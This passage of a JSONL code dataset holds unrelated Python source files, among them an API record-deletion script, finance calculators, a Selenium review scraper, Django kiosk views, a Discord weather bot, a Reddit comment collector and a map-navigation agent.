# `data` will contain an `errors` key. 
\n        # the default JSONRenderer will handle rendering errors\n\n        if type(data) is ReturnList:\n            return json.dumps({\n                self.object_label: data\n            })\n\n        if type(data) is dict:\n            errors = data.get('errors', None)\n            if errors is not None:\n                return json.dumps({\n                    'errors': data['errors']\n                })\n\n        return json.dumps({\n            self.object_label: data\n        })","sub_path":"ratebum/apps/core/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"609165137","text":"# App to get support_action records with specific action keys.\nimport argparse\nimport requests\nimport yaml\nimport json\n\n# Get the login credentials\nparser = argparse.ArgumentParser(description='Read supporters')\nparser.add_argument('--login', dest='loginFile', action='store',\n                    help='YAML file with login credentials')\nparser.add_argument('--input', dest='keyFile', action='store',\n\t\t    help='Backup file of supporter_action_KEY records to delete')\n\nargs = parser.parse_args()\ncred = yaml.load(open(args.loginFile))\n\n# Authenticate\npayload = {\n    'email': cred['email'],\n    'password': cred['password'],\n    'json': True }\ns = requests.Session()\nu = 'https://' + cred['host'] + '/api/authenticate.sjs'\nr = s.get(u, params=payload)\nj = r.json()\nif j['status'] == 'error':\n    print('Authentication failed: ', j)\n    exit(1)\n\nprint('Authentication: ', j)\n\nf = open(args.keyFile, 'r')\nkeys = [ line.split('\\t')[0] for line in f ]\nf.close()\n\n# We have a backup in the file. That means that we can just whack\n# the records without the API examining them first.\nfor key in keys:\n    print(f\"{key}\")\n    payload = {'json': True,\n               'object': 'supporter_action',\n               'key': key }\n    u = 'https://'+ cred['host'] +'/delete'\n    r = s.get(u, params=payload)\n    print(f\"{key}: {r.json()}\")\n","sub_path":"supporter_action_cleanup.py","file_name":"supporter_action_cleanup.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"376662421","text":"import math\n\nprint(\"\\nChoose either 'investment' or 'bond' from the menu below to proceed:\\n\\n 1. Investement - to calculate the amount of interest you'll earn on interest.\\n 2. Bond - to calculate the amount you'll have to pay on a home loan.\\n\")\nuser_choice = input(\"Please enter your selection here: \")\n#Initial input from user\nif len(user_choice) == 0:\n    print(\"**Error - no selection has been made.**\\n\")\n#Error message\nif user_choice.lower() == \"investment\":\n    print(\"\\nPlease answer the following questions:\")\n    deposit = float(input(\"\\n\\t 1. Please enter the amount of money that you want to invest: R\"))\n    int_rate = float(input(\"\\n\\t 2. Please enter the interest rate: \"))\n    years = float(input(\"\\n\\t 3. How many years would like to invest for your money for: \"))\n    interest = input(\"\\n\\t 4. Would you like to earn simple or compound interest? 
\")\n #Investment option input from user \n interest_dec = int_rate / 100\n simple_interest = round(deposit*(1+((interest_dec)*years)), 2) \n compound_interest = round((deposit)*math.pow((1+interest_dec),years), 2) \n#Formulae \n if interest.lower() == \"simple\":\n print(\"\\nThe total amount is: R\" + str(simple_interest))\n#Simple interest option\n if interest.lower() == \"compound\":\n print(\"\\nThe total amount is: R\" + str(compound_interest)) \n#Compound interest option\nif user_choice.lower() == \"bond\":\n print(\"\\nPlease answer the following questions:\")\n house_price = float(input(\"\\n\\t1. Please enter the value of the house: \"))\n house_int_rate = float(input(\"\\n\\t2. Please enter the interest rate: \"))\n months = float(input(\"\\n\\t3. Please enter the loan term in months: \"))\n#Bond option questions\n monthly_interest = house_int_rate / 100 / 12\n bond = round((monthly_interest*house_price) / (1-(1+monthly_interest)**(-months)), 2)\n#Bond option formula\n print(\"\\nYour monthly repayment will be: R\" + str(bond))\n","sub_path":"finance_calculators.py","file_name":"finance_calculators.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496012352","text":"import os\nimport cv2\nimport numpy\n\ndir = \"C:/Users/jeffp/pytorch-CycleGAN-and-pix2pix/datasets/cervoai_pix2pix_axial\"\ndir_train = dir + \"/train\"\ndir_test = dir + \"/test\"\ndir_val = dir + \"/val\"\ndir_test_fail = dir + \"/test_fail\"\ndir_list = [dir_train, dir_test, dir_val]\nfor directory in dir_list:\n breakpoint()\n for subdir, dirs, files in os.walk(directory):\n for file in files:\n img = cv2.imread(subdir + \"/\" + file)\n if numpy.sum(img) == 0:\n print(subdir + \"/\" + file + \" does not contain an image and will be removed.\")\n os.remove(subdir + \"/\" + file)\n","sub_path":"util/remove_black_images.py","file_name":"remove_black_images.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39712109","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nchromeDriver = \"C:\\\\Users\\\\parksoyoung\\\\Downloads\\\\chromedriver_win32\\\\chromedriver.exe\"\ndriver = webdriver.Chrome(chromeDriver)\ndriver.get('https://mobileticket.interpark.com/Goods/GoodsInfo/info?GoodsCode=20001874&is1=ticket&is2=product')\ntime.sleep(3)\n\ndriver.find_element_by_xpath('//*[@id=\"root\"]/div[@class=\"contents\"]/div[@class=\"productsInformation\"]/div[@class=\"productsTabWrap\"]'\n '/*[@id=\"productsTab\"]/ul/li[3]').click()\nelem = driver.find_element_by_tag_name(\"body\")\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n for i in range(10):\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(30)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\ntime.sleep(3)\nsource = driver.page_source\nsoup = BeautifulSoup(source, \"html.parser\")\n\ndriver.quit()\n\nsports = soup.find(\"ul\", {\"id\": \"writerInfo\"})\ncomments_li =sports.find_all(\"li\")\nprint(len(comments_li))\n\nresult = pd.DataFrame()\ntitles = []\nreviews = 
[]\nlabels = []\nrates = []\n\nfor li in comments_li:\n #print(li.find(\"div\", {\"class\": \"userBoardTitle\"}).find(\"b\").find(text=True))\n title = li.find(\"div\", {\"class\": \"userBoardTitle\"}).find(\"b\").find(text=True)\n #print(li.find(\"div\", {\"class\": \"boardContentTxt\"}).find(text=True))\n text = li.find(\"div\", {\"class\": \"boardContentTxt\"}).find(text=True)\n #print(li.find(\"div\", {\"class\": \"shareInfo\"}).find(\"div\").get(\"class\"))\n rate = li.find(\"div\", {\"class\": \"shareInfo\"}).find(\"div\").get(\"class\")\n score = int(rate[1][5:])\n #print(score)\n if score >= 8:\n label = 1\n elif score <= 6:\n label = 0\n else:\n continue\n\n titles.append(title)\n reviews.append(text)\n labels.append(label)\n rates.append(score)\n\n\n\nresult['title'] = titles\nresult['review'] = reviews\nresult['label'] = labels\nresult['rating'] = rates\n\nresult.to_csv('sports_auc.txt', encoding=\"utf8\", sep=\"\\t\")","sub_path":"data/crawling/sports_auction.py","file_name":"sports_auction.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529359140","text":"# -*- coding: utf-8 -*-\n\"\"\"Setup file for the Pigi1300 project.\n\"\"\"\n\nimport codecs\nimport os.path\nimport re\nimport sys\nfrom setuptools import setup, find_packages\n\nversion = None\nfor line in codecs.open(os.path.join('pigi1300', '__init__.py'), 'r', encoding='utf-8'):\n matcher = re.match(r\"\"\"^__version__\\s*=\\s*['\"](.*)['\"]\\s*$\"\"\", line)\n version = version or matcher and matcher.group(1)\n\n# get README content from README.md file\nwith codecs.open(os.path.join(os.path.dirname(__file__), 'README.md'), encoding='utf-8') as fd:\n long_description = fd.read()\n\nentry_points = {u'console_scripts': [u'pigi1300-manage = djangofloor.scripts:manage',\n u'pigi1300-celery = djangofloor.scripts:celery',\n u'pigi1300-gunicorn = djangofloor.scripts:gunicorn']}\n\nsetup(\n name='pigi1300',\n version=version,\n description='No description yet.',\n long_description=long_description,\n author='Matthieu Gallet',\n author_email='mgallet@19pouces.net',\n license='CeCILL-B',\n url='',\n entry_points=entry_points,\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n test_suite='pigi1300.tests',\n install_requires=['djangofloor', 'PyPDF2', 'pybarcode', 'pillow', 'pypng', 'PyQRCode', 'reportlab', 'WeasyPrint'],\n setup_requires=[],\n classifiers=[],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417578904","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom ..contacts.models import Contact\nfrom .models import OpenHouse\n\n\n@login_required\ndef kiosk_enter(request, house_key):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n return render(request, 'openhouses/enter.html', {'open_house': open_house})\n\n@login_required\ndef kiosk_welcome(request, house_key):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n return render(request, 'openhouses/welcome.html', {'open_house': open_house, 'associate': request.user})\n\n@login_required\ndef kiosk_form(request, house_key, kind):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n assert kind in ['broker', 'buyer']\n\n if 'GET' == request.method:\n return render(request, 
'openhouses/form.html', {'open_house': open_house, 'kind': kind})\n elif 'POST' == request.method:\n email = request.POST.get('email_personal')\n email_matches = Contact.objects.filter(email_personal=email)\n if email and email_matches.exists():\n contact = email_matches[0]\n else:\n contact = Contact(owner=request.user, open_house_visit=open_house)\n\n for field in Contact.EDITABLE_FIELDS:\n value = request.POST.get(field)\n if value:\n setattr(contact, field, value)\n\n agent_data = {k.split('[')[1].strip(']'): v for k,v in request.POST.items() if k.startswith('agent[')}\n if 'first_name' in agent_data and 'last_name' in agent_data:\n agent_data['name'] = \"{} {}\".format(agent_data['first_name'], agent_data['last_name'])\n\n agent_data = filter_fields(agent_data, ContactTeamMember.EDITABLE_FIELDS)\n mortgage_data = {k.split('[')[1].strip(']'): v for k,v in request.POST.items() if k.startswith('mortgage[')}\n mortgage_data = filter_fields(mortgage_data, ContactTeamMember.EDITABLE_FIELDS)\n\n if len(agent_data):\n contact.team_member_set.create(**agent_data)\n\n if len(mortgage_data):\n contact.team_member_set.create(**mortgage_data)\n\n contact.mortage_qualified = request.POST.get('mortgage_qualified') == 'true'\n contact.save()\n\n\n return redirect(open_house.kiosk_url())\n\n\ndef send_customer_email(contact, open_house):\n pass\n","sub_path":"backend/hltpy/openhouses/kiosk_views.py","file_name":"kiosk_views.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"15905765","text":"import discord\nfrom discord.ext import commands\nfrom random import randint\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\n\nprint('Discord version:', discord.__version__)\n\nprefix = '!'\n\nwith open('token_test_bot.txt', 'r') as file:\n\ttoken = file.readline()\n\nbot = commands.Bot(command_prefix=prefix)\n\nstart_time = datetime.datetime.now()\n\n@bot.event\nasync def on_ready():\n\tprint('Bot is ready!')\n\n\n@bot.command(pass_context=True)\nasync def weer(ctx, *, msg=None):\n\t'''Toont het weerbericht'''\n\n\tplaatsen_dict = {\n\t\t\"haasrode\": \"http://www.meteo-info.be/nl/europa/belgie/weer-haasrode/details/N-2733974/\",\n\t\t\"leuven\": \"http://www.meteo-info.be/nl/europa/belgie/weer-leuven/details/N-2739976/\",\n\t\t\"oostende\": \"http://www.meteo-info.be/nl/europa/belgie/weer-oostende/details/N-2743704/\",\n\t}\n\n\tte_kiezen_plaatsen = [plaats for plaats in plaatsen_dict]\n\n\tif msg not in te_kiezen_plaatsen:\n\t\tplaatsen_str = ' | '.join(te_kiezen_plaatsen)\n\t\tawait bot.say('Gebruik: `!weer { ' + plaatsen_str + ' }`')\n\n\telse:\n\t\tbezig = await bot.say('Bezig...')\n\n\t\thtml = requests.get(plaatsen_dict[msg]).text[15100:17500]\n\n\t\tsoup = BeautifulSoup(html, features=\"html.parser\")\n\t\tdiv_text = soup.find(\"div\", {\"id\": \"weather-detail-summary\"}).getText()\n\n\t\tsearch_str = 'Gem. wind: (.*) km/h\\n.*Rel. 
luchtvochtigheid: (.*) %\\n\\n\\n(.*)'\n\t\tm = re.search(search_str, div_text)\n\n\t\twindsnelheid, luchtvochtigheid, temperatuur = m.group(1), m.group(2), m.group(3)\n\n\t\tembed = discord.Embed(title='Weerbericht',\n\t\t\t\t\t\t\t color=randint(0, 0xffffff),\n\t\t\t\t\t\t\t description='Het weer in ' + msg)\n\t\t# color=discord.Color.green()\n\n\t\tembed.set_author(name=bot.user.name, icon_url=bot.user.avatar_url)\n\n\t\tmsg_author = ctx.message.author\n\n\t\tavatar_url = msg_author.avatar_url\n\t\tif not avatar_url:\n\t\t\tavatar_url = msg_author.default_avatar_url\n\t\tembed.set_thumbnail(url=avatar_url)\n\n\t\tembed.add_field(name='Gemiddelde windsnelheid', value=windsnelheid + ' km/h', inline=False)\n\t\tembed.add_field(name='Relatieve luchtvochtigheid', value=luchtvochtigheid + ' %', inline=False)\n\t\tembed.add_field(name='Temperatuur', value=temperatuur, inline=False)\n\t\tembed.add_field(name='Tijd', value=str(datetime.datetime.now().replace(microsecond=0)), inline=False)\n\n\t\tembed.set_footer(text='Gevraagd door ' + msg_author.display_name)\n\n\t\tawait bot.delete_message(bezig)\n\t\tawait bot.say(embed=embed)\n\t\tawait bot.send_message(msg_author, embed=embed)\n\n\n@bot.command()\nasync def uptime():\n\tawait bot.say('Uptime: ' + str(datetime.datetime.now().replace(microsecond=0) - start_time.replace(microsecond=0)))\n\n\nbot.run(token)\n","sub_path":"weer_v1.py","file_name":"weer_v1.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576107694","text":"ID_PERSISTS = 1\nID_CHANGES_AND_PERSISTS = 2\nID_RESETS = 3\n\ndef main(request, response):\n response.headers.set(\"Content-Type\", \"text/event-stream\")\n try:\n test_type = int(request.GET.first(\"type\", ID_PERSISTS))\n except:\n test_type = ID_PERSISTS\n\n if test_type == ID_PERSISTS:\n return \"id: 1\\ndata: 1\\n\\ndata:2\\n\\n\"\n\n elif test_type == ID_CHANGES_AND_PERSISTS:\n return \"id: 1\\ndata: 1\\n\\nid: 2\\ndata:2\\n\\ndata:3\\n\\n\"\n\n elif test_type == ID_RESETS:\n return \"id: 1\\ndata: 1\\n\\nid:\\ndata:2\\n\\ndata:3\\n\\n\"\n\n else:\n return \"data: invalid_test\\n\\n\"\n","sub_path":"eventsource/resources/last-event-id2.py","file_name":"last-event-id2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214964187","text":"#!/usr/bin/env python3\n\ndef fun1(s):\n if len(s) > 8:\n return True\n else:\n return False\n\ndef fun2(s):\n num1 = 0\n num2 = 0\n num3 = 0\n num4 = 0\n for ss in s:\n if 'a'<=ss<='z':\n num1 = 1\n elif 'A' <=ss<='Z':\n num2 = 1\n elif '0'<=ss<='9':\n num3 = 1\n else:\n num4 = 1\n\n if (num1+num2+num3+num4) >= 3:\n return True\n else:\n return False\n\ndef fun3(s):\n for i in range(len(s)-3):\n if s[i:i+3] in s[i+1:]:\n return False\n break\n return True\n\nwhile True:\n try:\n a = input()\n if fun1(a) and fun2(a) and fun3(a):\n print('OK')\n else:\n print('NG')\n\n except:\n break\n","sub_path":"huawei_jishi/20_jiandanmima.py","file_name":"20_jiandanmima.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491840672","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\n\ndf = pd.read_csv('C:\\\\Users\\\\Kanishk Wadhwa\\\\MLAPP\\\\trainloan.csv')\nfor column in 
['Gender','Married','Dependents','Self_Employed','Loan_Amount_Term','Credit_History']:\n df[column].fillna(df[column].mode()[0],inplace=True)\n\ndf['LoanAmount']=df['LoanAmount'].fillna(df['LoanAmount'].dropna().mean())\ndf['Dependents'] = df['Dependents'].str.rstrip('+')\ndf['Gender'] = df['Gender'].map({'Female':0,'Male':1}).astype(np.int)\ndf['Married'] = df['Married'].map({'No':0, 'Yes':1}).astype(np.int)\ndf['Education'] = df['Education'].map({'Not Graduate':0, 'Graduate':1}).astype(np.int)\ndf['Self_Employed'] = df['Self_Employed'].map({'No':0, 'Yes':1}).astype(np.int)\ndf['Loan_Status'] = df['Loan_Status'].map({'N':0, 'Y':1}).astype(np.int)\ndf['Dependents'] = df['Dependents'].astype(np.int)\n\narray =df.values\n\nX=array[:,6:10]\nX=X.astype('int')\ny=array[:,12]\ny=y.astype('int')\n#X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\n\nlr=LogisticRegression()\nlr.fit(X,y)\n\npickle.dump(lr, open('model.pkl','wb'))\n\nmodel = pickle.load(open('model.pkl','rb'))","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653019951","text":"import wx\nimport sys\nimport praw\nimport csv\nimport os\nimport time\nimport json\n\nclass MyFrame(wx.Frame):\n \"\"\"A class with two boxes, a button and a statictext\"\"\"\n def __init__(self, parent):\n \"\"\"constructor\"\"\"\n wx.Frame.__init__(self, parent, -1, 'Easy Corpus Compiler 0.01', size=(350, 200))\n self.panel = wx.Panel(self)\n\n self.gtext = wx.TextCtrl(self.panel, -1, size =(200,-1), value=\"subreddit goes here\")\n button = wx.Button(self.panel,wx.ID_ANY, label=\"enter\", size=(100, 50))\n self.Bind(wx.EVT_BUTTON, self.yesitstrue, button)\n self.stext = wx.StaticText(self.panel,wx.ID_ANY, label='Ready')\n\n siz = wx.BoxSizer(wx.VERTICAL)\n\n siz.Add(self.gtext,1)\n siz.Add(button,1)\n siz.Add(self.stext,1)\n self.panel.SetSizer(siz)\n\n def yesitstrue(self, event):\n try:\n config = json.loads(open('config.json').read())\n pass\n except:\n dlg2 = wx.MessageDialog(self,'Please make sure that you have the config.json file present in the same folder',wx.OK)\n result2 = dlg2.ShowModal()\n dlg2.Destroy()\n if result2 == wx.ID_OK:\n self.Destroy()\n username = config['username']\n password = config['password'] \n useragent = config['userAgent']\n #login to reddit\n r = praw.Reddit(useragent)\n r.login(username, password)\n self.stext.SetLabel('Logging into Reddit.....')\n #Change to selected location\n #os.chdir(sav)\n #Folder to contain the files\n if not os.path.exists('corpus'):\n os.makedirs('corpus')\n \n \n #Get subreddit\n subrdt = self.gtext.GetValue()\n #raw_input('Please enter a subreddit to collect comments from: ')\n #set up lists\n sublist = []\n comlist = []\n #get hot submissions\n subreddit = r.get_subreddit(subrdt)\n posts = subreddit.get_hot()\n for submission in posts:\n sublist.append(submission.id)\n #set number of loops\n missionlist = len(sublist)\n mlst = str(missionlist)\n self.stext.SetLabel('There are '+mlst+' hot submissions in that subreddit.')\n #define starting point for using the list\n i = 0\n if missionlist > 100:\n missionlist = 100\n self.stext.SetLabel('That\\'s too many, I am going to parse 100 instead.')\n def cleanUp(text):\n alpha = text.encode('utf-8')\n return alpha\n \n while i < missionlist:\n submission = r.get_submission(submission_id=sublist[i])\n submission.replace_more_comments(limit=16, threshold=10)\n flat_comments = 
praw.helpers.flatten_tree(submission.comments)\n pstitle = submission.title.encode('ascii',errors='ignore')\n self.stext.SetLabel('Now processing: '+pstitle)\n stitle = (((submission.title.encode('ascii',errors='ignore')).replace(' ','_')).replace('\"','')).replace('/','_')\n ftitle = 'corpus/'+stitle[:40]\n file = open('corpus/'+stitle[:40]+'.csv','a')\n writer = csv.writer(file)\n writer.writerow(['Karma','Comment Body','Comment ID'])\n for comment in flat_comments: \n comtitle = comment.id\n if comment.id not in comlist:\n cleancomment = cleanUp(comment.body)\n comlist.append(comment.id)\n cleanscore = str(comment.score)\n writer.writerow([cleanscore,cleancomment,comtitle])\n file.close()\n i+=1\n time.sleep(10)\n \n self.stext.SetLabel('Done')\n\n\nif __name__ == '__main__':\n app = wx.App()\n frame = MyFrame(None)\n frame.Show()\n app.MainLoop()","sub_path":"EasyCorpusCompiler.Mac.py","file_name":"EasyCorpusCompiler.Mac.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43547126","text":"from titus_isolate import log\nfrom titus_isolate.model.processor.utils import get_workload_ids\n\n\ndef get_updates(cur_cpu, new_cpu):\n updates = {}\n for workload_id in get_workload_ids(new_cpu):\n new_thread_ids = __get_threads(new_cpu, workload_id)\n cur_thread_ids = __get_threads(cur_cpu, workload_id)\n if set(new_thread_ids) != set(cur_thread_ids):\n log.info(\"workload: '{}' updated threads from: '{}' to: '{}'\".format(workload_id, cur_thread_ids, new_thread_ids))\n updates[workload_id] = new_thread_ids\n\n return updates\n\n\ndef __get_threads(cpu, workload_id):\n return [t.get_id() for t in cpu.get_threads() if workload_id in t.get_workload_ids()]\n","sub_path":"titus_isolate/isolate/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598288895","text":"__author__ = 'Caleytown'\n\nimport numpy as np\nfrom random import randint\nimport random\nfrom networkFolder.functionList import Map, WorldEstimatingNetwork, DigitClassificationNetwork\n\n# Create the world estimating network\nuNet = WorldEstimatingNetwork()\n\n# Create the digit classification network\nclassNet = DigitClassificationNetwork()\n\n\ndef get_goal(digit):\n \"\"\"\n Returns a tuple containing\n - the goal location based on the digit\n \"\"\"\n goals = [(0, 27), (27, 27), (27, 0)]\n if digit in range(0, 3):\n goal = goals.pop(0)\n elif digit in range(3, 6):\n goal = goals.pop(1)\n elif digit in range(6, 10):\n goal = goals.pop(2)\n else:\n raise ValueError(\"Bad digit input: \" + str(digit))\n return goal\n\n\ndef compute_distance(pos1, pos2, which_dist='manhattan'):\n if which_dist == 'manhattan':\n # Manhattan distance\n dist = abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n else:\n # Euclidean distance\n squared_dist = (pos1[0] - pos2[0]) ** 2 + (pos1[1] - pos2[1]) ** 2\n dist = np.sqrt(squared_dist)\n return dist\n\n\ndef entropy(p):\n # Compute the entropy of a probability distribution p\n log_p = np.log2(p)\n return - np.dot(p, log_p)\n\n\ndef softmax(p):\n # p: probability distribution\n return np.exp(p) / sum(np.exp(p))\n\n\ndef get_adjacent_states(position, image=None):\n \"\"\"\n returns the adjacent states to the current position\n Args:\n image: map\n position: current position of the robot\n\n Returns: dictionary of coordinates (values) of adjacent states and direction leading to those states 
(keys)\n\n \"\"\"\n neighbors = {}\n pos_left = [position[0] - 1, position[1]]\n pos_right = [position[0] + 1, position[1]]\n pos_up = [position[0], position[1] - 1]\n pos_down = [position[0], position[1] + 1]\n for direction, coordinates in zip(['left', 'right', 'down', 'up'], [pos_left, pos_right, pos_down, pos_up]):\n if coordinates[0] < 0 or coordinates[0] > 27 or coordinates[1] < 0 or coordinates[1] > 27:\n continue\n else:\n neighbors[direction] = coordinates\n return neighbors\n\n\ndef get_neighboring_pixels0(image, position):\n \"\"\"\n retrieve the value of the surrounding pixels at location 'position' given the map\n \"\"\"\n pixel_values = -10000 * np.ones((1, 4)).ravel() # if the position is out of the map, return -1\n\n pos_left = [position[0] - 1, position[1]]\n pos_right = [position[0] + 1, position[1]]\n pos_up = [position[0], position[1] - 1]\n pos_down = [position[0], position[1] + 1]\n for i, pos in enumerate([pos_left, pos_right, pos_down, pos_up]):\n if pos[0] < 0 or pos[0] > 27 or pos[1] < 0 or pos[1] > 27:\n continue\n else:\n pixel_values[i] = image[pos[0], pos[1]]\n return pixel_values, [pos_left, pos_right, pos_down, pos_up]\n\n\ndef get_neighboring_pixels(image, neighbors_position):\n \"\"\"\n retrieve the value of the surrounding pixels at location 'position' given the map\n \"\"\"\n pixel_values = {}\n for action in neighbors_position:\n pos = neighbors_position[action]\n # print('pos:', neighbors_position)\n pixel_values[action] = image[pos[0], pos[1]]\n return pixel_values\n\n\nclass InformedNavigator:\n def __init__(self):\n # The random navigator doesn't have any data members\n # But a more complex navigator may need to keep track of things\n # so you can create data members in this constructor\n # self.my_variable = 0\n\n # initialiaze the entropy to one to signal maximum uncertainty in the beginning\n self.better_goal_loc = None\n self.visited_locations = set()\n self.visited_locations.add((0, 0))\n self.directions = ['left', 'right', 'down', 'up']\n self.path = []\n self.alpha = 0.6\n pass\n\n def getAction(self, robot, map):\n \"\"\" Randomly selects a valid direction for the robot to travel\n\n The RandomNavigator completely ignores the incoming map of what has been seen so far.\n Maybe a smarter agent would take this additional info into account...\n \"\"\"\n\n # This loop shows how you can create a mask, an grid of 0s and 1s\n # where 0s represent unexplored areas and 1s represent explored areas\n # This mask is used by the world estimating network\n mask = np.zeros((28, 28))\n for col in range(0, 28):\n for row in range(0, 28):\n if map[col, row] != 128:\n mask[col, row] = 1\n\n # Creates an estimate of what the world looks like\n image = uNet.runNetwork(map, mask)\n\n # Use the classification network on the estimated image\n # to get a guess of what \"world\" we are in (e.g., what the MNIST digit of the world)\n char = classNet.runNetwork(image).ravel()\n output_dist = softmax(char)\n\n robot_loc = robot.getLoc()\n neighbors = get_adjacent_states(robot_loc)\n # neighbors_pixel, neighbors_position = get_neighboring_pixels(image, robot_loc)\n neighbors_pixel = get_neighboring_pixels(image, neighbors)\n # info_gain = np.zeros((1, 4))\n\n self.path.append(robot_loc)\n\n if self.better_goal_loc is not None:\n goal_loc = self.better_goal_loc\n else:\n goal_loc = get_goal(np.argmax(output_dist))\n # print(f'predicted number: {np.argmax(output_dist)} -- goal state returned: {goal_loc}')\n\n direction = None\n\n print('max probability:', 
max(output_dist))\n\n if max(output_dist) >= 0.40:\n alpha = 0\n else:\n alpha = self.alpha\n\n # elif self.nbr_steps % 15 == 0:\n # self.alpha = self.alpha - self.alpha * 0.05\n\n max_total_cost = -np.inf\n for action in neighbors_pixel.keys():\n info_qual = abs(image[robot_loc[0], robot_loc[1]] - neighbors_pixel[action])\n cost = compute_distance(goal_loc, neighbors[action])\n neighbor_cost = alpha * info_qual - (1 - alpha) * cost\n if neighbor_cost >= max_total_cost:\n max_total_cost = neighbor_cost\n direction = action\n new_pos = neighbors[action]\n else:\n continue\n\n # If it is not a valid move, reset\n if not robot.checkValidLoc(new_pos[0], new_pos[1]) or tuple(new_pos) in self.visited_locations:\n direction = None\n\n if direction is None:\n potential_actions = list(neighbors.keys())\n direction = random.choice(potential_actions)\n\n self.visited_locations.add(tuple(neighbors[direction]))\n return direction\n\n def reset(self):\n self.better_goal_loc = None\n self.visited_locations = set()\n self.visited_locations.add((0, 0))\n self.current_entropy = 1 # np.ones((1, 4))\n self.directions = ['left', 'right', 'down', 'up']\n self.path = []\n","sub_path":"InformedNavigator.py","file_name":"InformedNavigator.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257817802","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx_rough= np.loadtxt(\"x.out\")\ny_rough= np.loadtxt(\"y.out\")\nlen_arrays= 2*len(x_rough) + 4 #(4 corners + 4 points on the edge of the fault zone )\nheight_of_domain= 40 #(km)\n\n\n # working on the node part of dynosol 2d\n\nx = np.zeros(len_arrays)\ny= np.zeros(len_arrays)\n\nx[0]= 0.0 \t\t\t\t\t\t\t\t\t\t\t \t\t# top left corner\nx[1]= x_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t\t\t\t\t\t# top right corner\n\nx[2]= x_rough[0]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# upper center left corner\nx[3:3+len(x_rough)-2]= x_rough[1: (len(x_rough)-1 )] \t\t\t\t\t\t\t\t# upper level of body of rough fault\nx[3+len(x_rough)-2]= x_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t\t# upper center right corner\t\n\nx[3+len(x_rough)-2+ 1]=\tx_rough[0]\t\t\t\t\t\t\t\t\t\t\t\t# lower center left corner\nx[3+len(x_rough)-2+ 2 : 3+ 2* (len(x_rough)-2) +2 ]= x_rough[1:len(x_rough)-1] \t\t# lower level of body of rough fault\nx[3+ 2* (len(x_rough)-2) +2] = x_rough[len(x_rough)-1] \t\t\t\t\t \t\t# lower center right corner\n\nx[3+ 2* (len(x_rough)-2) +3] = 0.0 \t\t\t\t\t\t\t\t\t\t\t# lower left corner\nx[3+ 2* (len(x_rough)-2) +4] = x_rough[len(x_rough)-1] \t\t\t\t\t\t\t# lower right corner\n\n\n\ny[0]= height_of_domain \t\t\t\t\t\t\t\t\t\t# top left corner\ny[1]= height_of_domain\t\t\t\t\t\t\t\t\t\t\t\t\t\t# top right corner\n\ny[2]= 1.0 + y_rough[0] \t\t\t\t\t\t\t\t\t\t\t\t\t\t# upper center left corner\ny[3:3+len(x_rough)-2]= 1.0 + y_rough[1: (len(x_rough)-1 )] \t\t\t\t \t\t# upper level of body of rough fault\ny[3+len(x_rough)-2]= 1.0 + y_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t# upper center right corner\t\n\ny[3+len(x_rough)-2+ 1]=\ty_rough[0] -1.0 \t\t\t\t\t\t\t\t\t\t\t\t\t# lower center left corner\ny[3+len(x_rough)-2+ 2 : 3+ 2* (len(x_rough)-2) +2 ]= y_rough[1:len(x_rough)-1] -1.0 